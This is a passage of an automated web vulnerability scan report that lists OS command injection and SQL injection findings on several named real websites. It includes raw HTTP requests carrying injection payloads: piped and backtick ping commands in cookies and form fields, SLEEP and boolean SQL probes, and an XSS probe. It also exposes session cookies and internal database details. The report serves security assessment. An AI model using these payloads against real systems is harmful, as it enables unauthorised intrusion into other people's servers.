32.137. http://www.nbcconnecticut.com/fonts/nobel_bold.ttf

32.138. http://www.nextadvisor.com/includes/javascript.php

32.139. http://www.socialfollow.com/button/image/

32.140. http://www.socialfollow.com/js/flash-detect.js

32.141. http://www.socialfollow.com/js/jquery.js

32.142. http://www.socialfollow.com/js/thickbox.js

32.143. http://www.socialfollow.com/js/validator.js

32.144. http://www.tagged.com/api/

32.145. http://www.tagged.com/favicon.ico

32.146. http://www2.sesamestats.com/paneltracking.aspx

33. Content type is not specified

33.1. http://ad.yieldmanager.com/st

33.2. http://www.expedia.com/static/default/default/images/close.gif

33.3. http://www.expedia.com/static/frog/v0.1a/images/iconSpritesT.png

33.4. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

33.5. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

33.6. http://www.expedia.com/static/fusion/v2.3/images/customersupport/flyout_arrow.png

33.7. http://www.expedia.com/static/fusion/v2.3/images/customersupport/lady78x78.gif

33.8. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

33.9. http://www.expedia.com/static/fusion/v2.3/images/wizard/promo_bg.png

33.10. http://www.expedia.com/static/fusion/v2.3/images/wizard/wizard_out_bg.gif

33.11. http://www.socialfollow.com/button/image/

33.12. http://www.socialfollow.com/button/image/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

34. SSL certificate

34.1. https://broker.gotoassist.com/

34.2. https://mosaicsecurity.com/

34.3. https://secure.trust-guard.com/

34.4. https://subscribe.haymarketmedia.com/

34.5. https://verify.authorize.net/

34.6. https://www.expedia.com/

34.7. https://www.gofileroom.com/

34.8. https://www.taxnotebook.com/



1. OS command injection
There are 6 instances of this issue:

Issue background

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.

OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.

Issue remediation

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform commands other than the one intended.

If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:



1.1. https://secure.trust-guard.com/ [__utmb cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmb cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmb cookie. The application took 50222 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384|ping%20-n%2020%20127.0.0.1||x

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:03:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.2. https://secure.trust-guard.com/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /

Issue detail

The __utmc cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses; however, it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmc cookie. The application took 25682 milliseconds to respond to the request, compared with 225 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET / HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874|ping%20-n%2020%20127.0.0.1||x; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:56:06 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.3. https://secure.trust-guard.com/ResetPassword.php [txtEmail parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /ResetPassword.php

Issue detail

The txtEmail parameter appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the txtEmail parameter. The application took 50190 milliseconds to respond to the request, compared with 25263 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

POST /ResetPassword.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
Origin: https://secure.trust-guard.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; PHPSESSID=j3kca4chjn64leo452bv3ml9a4
Content-Length: 66

txtEmail=-111%27+OR+SLEEP%2825%29%3D0+LIMIT+1--++|ping%20-n%2020%20127.0.0.1||x&btnSubmit=Submit

Response

HTTP/1.1 302 Found
Date: Sat, 07 May 2011 01:20:55 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 200
Location: index.php
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


1.4. https://secure.trust-guard.com/index.php [__utma cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utma cookie appears to be vulnerable to OS command injection attacks. It is possible to use backtick characters (`) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload `ping%20-c%2020%20127.0.0.1` was submitted in the __utma cookie. The application took 50194 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3`ping%20-c%2020%20127.0.0.1`; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:30:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.5. https://secure.trust-guard.com/index.php [__utmz cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The __utmz cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the __utmz cookie. The application took 25161 milliseconds to respond to the request, compared with 6249 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /index.php HTTP/1.1
Host: secure.trust-guard.com
Connection: keep-alive
Referer: https://secure.trust-guard.com/ResetPassword.php
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|ping%20-n%2020%20127.0.0.1||x; PHPSESSID=j3kca4chjn64leo452bv3ml9a4; __utma=147269874.1166530582.1303748966.1303758698.1304747384.3; __utmc=147269874; __utmb=147269874.1.10.1304747384

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:12:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5008
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...

1.6. http://www.hunton.com/aboutus/uniGC.aspx [BIGipServerH1-HUNTON-A0910-80 cookie]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.hunton.com
Path:   /aboutus/uniGC.aspx

Issue detail

The BIGipServerH1-HUNTON-A0910-80 cookie appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.

The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the BIGipServerH1-HUNTON-A0910-80 cookie. The application took 47061 milliseconds to respond to the request, compared with 8762 milliseconds for the original request, indicating that the injected command caused a time delay.

Request

GET /aboutus/uniGC.aspx?xpST=AboutUs HTTP/1.1
Host: www.hunton.com
Proxy-Connection: keep-alive
Referer: http://www.hunton.com/news/uniGC.aspx?xpST=PENSearch
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=fwzgqujjzcm2lrafhxcipc55; CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; BIGipServerH1-HUNTON-A0910-80=1092146954.20480.0000|ping%20-c%2020%20127.0.0.1||x; __utmz=267908375.1304742363.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); sessionKey=8be6cff3-b698-403d-b33f-091ebc4e1304; __utma=267908375.1939147739.1304742363.1304742363.1304742363.1; __utmc=267908375; __utmb=267908375.3.10.1304742363; Language=7483b893-e478-44a4-8fed-f49aa917d8cf; SERVER_PORT=80; Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; DefaultCulture=en-US; Mode=1; EventingStatus=1; NavId=0; PortletId=0; SiteId=0; ZoneId=0

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:17:29 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 05
x-client: 000040
x-apptype: 01
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 01
x-server: EG-H1WS-A09
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1844; path=/
Set-Cookie: PortletId=5981402; path=/
Set-Cookie: SiteId=1837; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=0&UsesDaylightSavings=False&TimeZoneAbbrev=IDLW&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >


<head>
<tit
...[SNIP]...

2. SQL injection
There are 65 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and to avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



2.1. http://ads.allatsea.net/www/delivery/spc.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ads.allatsea.net
Path:   /www/delivery/spc.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d1--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:21 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:21 GMT; path=/
Content-Size: 6150
Content-Length: 6150
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=f67466d6e0__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_f67466d6e0\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D1--+atta&amp;cb=f67466d6e0\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_2'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_2'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_2'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_2'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_2'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_2'] += "google_ad_width = 125;\n";
OA_output['zone_22_2'] += "google_ad_height = 125;\n";
OA_output['zone_22_2'] += "//-->\n";
OA_output['zone_22_2'] += "<"+"/script>\n";
OA_output['zone_22_2'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_2'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_2'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_f641e7f716\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatse
...[SNIP]...

Request 2

GET /www/delivery/spc.php?zones=zone_22_1%3D5%7Czone_22_2%3D5%7Czone_22_3%3D5%7Czone_22_4%3D5%7Czone_22_5%3D5%7Czone_22_6%3D5%7Czone_22_7%3D5%7Czone_22_8%3D5%7Czone_2%3D2%7Czone_5%3D4%7Czone_21%3D3%7Czone_1%3D1%7C&nz=1&source=&r=55470886&block=1&charset=UTF-8&loc=http%3A//allatsea.net/by-category/Sailing_Reg/1%20and%201%3d2--%20atta HTTP/1.1
Host: ads.allatsea.net
Proxy-Connection: keep-alive
Referer: http://allatsea.net/by-category/Sailing_Regatta
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=168508913.1304734000.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=168508913.126629396.1304734000.1304734000.1304734000.1; __utmc=168508913; __utmb=168508913.1.10.1304734000; __qca=P0-1797107816-1304734004419; OAID=a9e7a0f4da4672bb2cdfb39a4d109071

Response 2

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 21:33:22 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=a9e7a0f4da4672bb2cdfb39a4d109071; expires=Sat, 05-May-2012 21:33:22 GMT; path=/
Content-Size: 6788
Content-Length: 6788
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['zone_22_1'] = '';
OA_output['zone_22_1'] += "<"+"span><"+"script type=\'text/javascript\'><"+"!--// <"+"![CDATA[\n";
OA_output['zone_22_1'] += "/* openads=http://ads.allatsea.net/www/delivery bannerid=10 zoneid=5 source= */\n";
OA_output['zone_22_1'] += "// ]]> --><"+"/script><"+"script type=\"text/javascript\"><"+"!--\n";
OA_output['zone_22_1'] += "google_ad_client = \"ca-pub-9585000347357330\";\n";
OA_output['zone_22_1'] += "/* 125x125, created 3/14/10 */\n";
OA_output['zone_22_1'] += "google_ad_slot = \"8399079020\";\n";
OA_output['zone_22_1'] += "google_ad_width = 125;\n";
OA_output['zone_22_1'] += "google_ad_height = 125;\n";
OA_output['zone_22_1'] += "//-->\n";
OA_output['zone_22_1'] += "<"+"/script>\n";
OA_output['zone_22_1'] += "<"+"script type=\"text/javascript\"\n";
OA_output['zone_22_1'] += "src=\"http://pagead2.googlesyndication.com/pagead/show_ads.js\">\n";
OA_output['zone_22_1'] += "<"+"/script><"+"script type=\'text/javascript\' src=\'http://ads.allatsea.net/www/delivery/ag.php\'><"+"/script><"+"/span><"+"div id=\'beacon_4f7d84567b\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=10&amp;campaignid=3&amp;zoneid=5&amp;loc=1&amp;referer=http%3A%2F%2Fallatsea.net%2Fby-category%2FSailing_Reg%2F1+and+1%3D2--+atta&amp;cb=4f7d84567b\' width=\'0\' height=\'0\' alt=\'\' style=\'width: 0px; height: 0px;\' /><"+"/div>\n";
OA_output['zone_22_2'] = '';
OA_output['zone_22_2'] += "<"+"a href=\'http://ads.allatsea.net/www/delivery/ck.php?oaparams=2__bannerid=5__zoneid=5__cb=4dd54d6c2a__oadest=http%3A%2F%2Fwww.igymarinas.com\' target=\'_blank\'><"+"img src=\'http://ads.allatsea.net/www/images/e476945fd8f647e4fa8dc98870332858.gif\' width=\'125\' height=\'125\' alt=\'\' title=\'\' border=\'0\' /><"+"/a><"+"div id=\'beacon_4dd54d6c2a\' style=\'position: absolute; left: 0px; top: 0px; visibility: hidden;\'><"+"img src=\'http://ads.allatsea.net/www/delivery/lg.php?bannerid=5&amp;campaignid=4&amp;zoneid=5&amp;loc=http%3A%2F%2Fallatse
...[SNIP]...

2.2. http://apps.sapha.com/appshandler.php [ac parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the ac parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /appshandler.php?ac=1'&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:05:49 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1)<br>
...[SNIP]...

2.3. http://dce.sapha.com/engine.php [ac parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://dce.sapha.com
Path:   /engine.php

Issue detail

The ac parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ac parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /engine.php?ac=1' HTTP/1.1
Host: dce.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/company/about-sapha
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08

Response 1

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 385

</td></tr></table><b>Database error on host '192.168.50.20', db 'sapha_core', user 'www', object 'globalDB':</b> Invalid SQL: select SQL_CACHE * from site_options where site_ID = '1''<br>
<b>MySQL Err
...[SNIP]...
